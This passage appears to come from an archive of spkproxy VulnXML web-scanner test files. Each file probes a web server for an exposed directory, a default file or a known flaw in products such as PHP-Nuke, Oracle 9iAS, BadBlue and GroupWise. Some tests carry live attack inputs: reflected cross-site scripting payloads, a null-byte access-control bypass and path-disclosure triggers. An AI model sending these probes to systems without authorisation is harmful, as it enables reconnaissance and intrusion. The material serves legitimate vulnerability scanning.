are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-280.xml0100664000076500007650000000713007566204543017557 0ustar davedave (dms0) "Default Oracle 9iAS allows access to Dynamic Monitoring Services" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /dms0 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ DMSDUMP version 200 DMSDUMP version 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-281.xml0100664000076500007650000000704007566204543017560 0ustar davedave (doc-html/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /doc-html/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-282.xml0100664000076500007650000000725707566204543017573 0ustar davedave (dostuff.php?action=modify_user) "Blahz-DNS allows unauthorized users to edit user information. Upgrade to version 0.25 or higher. http://blahzdns.sourceforge.net/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /dostuff.php?action=modify_user HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-283.xml0100664000076500007650000000703007566204543017561 0ustar davedave (down/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /down/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-284.xml0100664000076500007650000000716607566204543017574 0ustar davedave (download.php?op=viewdownload) "PHPNuke allows file system paths to be revealed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /download.php?op=viewdownload HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Failed opening 200 Failed opening 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-285.xml0100664000076500007650000000716007566204543017567 0ustar davedave (download.php?op=viewdownload) "PHPNuke allows file system paths to be revealed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /download.php?op=viewdownload HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Fatal error 200 Fatal error 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-286.xml0100664000076500007650000000756507566204543017601 0ustar davedave (download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>) "This version of PHP-Nuke's download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /download.php?sortby=&dcategory=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-287.xml0100664000076500007650000000704007566204543017566 0ustar davedave (download/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /download/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-288.xml0100664000076500007650000000704207566204543017571 0ustar davedave (downloads/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /downloads/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-289.xml0100664000076500007650000000706107566204543017573 0ustar davedave (easylog/easylog.html) "Just found this file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /easylog/easylog.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-28.xml0100664000076500007650000000727707566204543017513 0ustar davedave (index.html.cz.iso8859-2) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.cz.iso8859-2 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-290.xml0100664000076500007650000000704207566204543017562 0ustar davedave (employees/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /employees/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-291.xml0100664000076500007650000000713307566204543017564 0ustar davedave (examples/jsp/snp/anything.snp) "Tomcat servlet gives lots of host information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /examples/jsp/snp/anything.snp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-292.xml0100664000076500007650000000702607566204543017566 0ustar davedave (exe/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exe/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-293.xml0100664000076500007650000000713107566204543017564 0ustar davedave (ext.ini.% 00.txt) "BadBlue allows access restrictions to be bypassed by using a null byte." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ext.ini.% 00.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-294.xml0100664000076500007650000000725407566204543017573 0ustar davedave (file-that-is-not-real-2002.php3) "PHP is configured to show the web root when sending error messages. Set display_errors to 'off'." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /file-that-is-not-real-2002.php3 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Unable to open 200 Unable to open 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-295.xml0100664000076500007650000000703007566204543017564 0ustar davedave (file/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /file/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-296.xml0100664000076500007650000000703207566204543017567 0ustar davedave (files/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /files/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-297.xml0100664000076500007650000000703207566204543017570 0ustar davedave (forum/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /forum/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-298.xml0100664000076500007650000000703607566204543017575 0ustar davedave (fpadmin/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /fpadmin/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-299.xml0100664000076500007650000000756507566204543017605 0ustar davedave (friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>) "This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-29.xml0100664000076500007650000000725307566204543017506 0ustar davedave (index.html.de) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.de HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-300.xml0100664000076500007650000000702607566204543017554 0ustar davedave (ftp/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ftp/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-301.xml0100664000076500007650000000711207566204543017551 0ustar davedave (getaccess) "This may be an indication that the server is running getAccess for SSO" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /getaccess HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-302.xml0100664000076500007650000000722307566204543017555 0ustar davedave (global.inc) "PHP-Survey's include file should not be available via the web. Configure the web server to ignore .inc files or change this to global.inc.php" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /global.inc HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-303.xml0100664000076500007650000000703707566204543017561 0ustar davedave (globals.jsa) "Oracle globals.jsa file" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /globals.jsa HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-304.xml0100664000076500007650000000704207566204543017556 0ustar davedave (guestbook/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /guestbook/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-305.xml0100664000076500007650000000703407566204543017560 0ustar davedave (guests/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /guests/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-306.xml0100664000076500007650000000730407566204543017561 0ustar davedave (GWWEB.EXE?HELP=bad-request) "Groupwise allows system information and file retrieval by modifying arguments to the help system. CAN-2002-0341." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /GWWEB.EXE?HELP=bad-request HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Could not find file SYS 200 Could not find file SYS 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-307.xml0100664000076500007650000000704307566204543017562 0ustar davedave (help/) "Help directory should not be accessible" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /help/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-308.xml0100664000076500007650000000703407566204543017563 0ustar davedave (hidden/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /hidden/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-309.xml0100664000076500007650000000704007566204543017561 0ustar davedave (hitmatic/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /hitmatic/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-30.xml0100664000076500007650000000725307566204543017476 0ustar davedave (index.html.dk) "Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /index.html.dk HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-310.xml0100664000076500007650000000706007566204543017553 0ustar davedave (hitmatic/analyse.cgi) "Just found this cgi..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /hitmatic/analyse.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-311.xml0100664000076500007650000000703507566204543017556 0ustar davedave (hits.txt) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /hits.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-312.xml0100664000076500007650000000704607566204543017561 0ustar davedave (hit_tracker/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /hit_tracker/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-313.xml0100664000076500007650000000725207566204543017561 0ustar davedave (home.php?arsc_language=elvish) "ARSC Really Simple Chat can reveal file system paths if an invalid language name is specified." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /home.php?arsc_language=elvish HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Failed opening ' 200 Failed opening ' 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-314.xml0100664000076500007650000000703007566204543017554 0ustar davedave (home/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /home/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the 